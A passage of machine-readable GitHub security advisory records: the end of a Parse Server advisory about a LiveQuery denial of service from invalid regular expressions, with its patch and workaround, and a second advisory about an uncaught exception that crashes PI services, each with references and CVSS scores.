"details": "### Impact\n\nA remote attacker can crash the Parse Server by subscribing to a LiveQuery with an invalid regular expression pattern. The server process terminates when the invalid pattern reaches the regex engine during subscription matching, causing denial of service for all connected clients.\n\n### Patches\n\nThe fix validates regular expression patterns at subscription time, rejecting invalid patterns before they are stored. Additionally, a defense-in-depth try-catch prevents any subscription matching error from crashing the server process.\n\n### Workarounds\n\nDisable LiveQuery if it is not needed.",
"id": "GHSA-827p-g5x5-h86c",
"modified": "2026-03-19T21:12:58Z",
"published": "2026-03-17T18:37:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-827p-g5x5-h86c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32770"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/10197"
},
{
"type": "WEB",
"url": "https://github.com/parse-community/parse-server/pull/10199"
},
{
"type": "PACKAGE",
"url": "https://github.com/parse-community/parse-server"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Parse Server LiveQuery subscription with invalid regular expression crashes server"
}
GHSA-83RC-2389-WCCM
Vulnerability from github – Published: 2026-02-10 21:31 – Updated: 2026-02-10 21:31The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.
{
"affected": [],
"aliases": [
"CVE-2026-1507"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-10T21:16:01Z",
"severity": "HIGH"
},
"details": "The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.",
"id": "GHSA-83rc-2389-wccm",
"modified": "2026-02-10T21:31:31Z",
"published": "2026-02-10T21:31:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1507"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-03"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.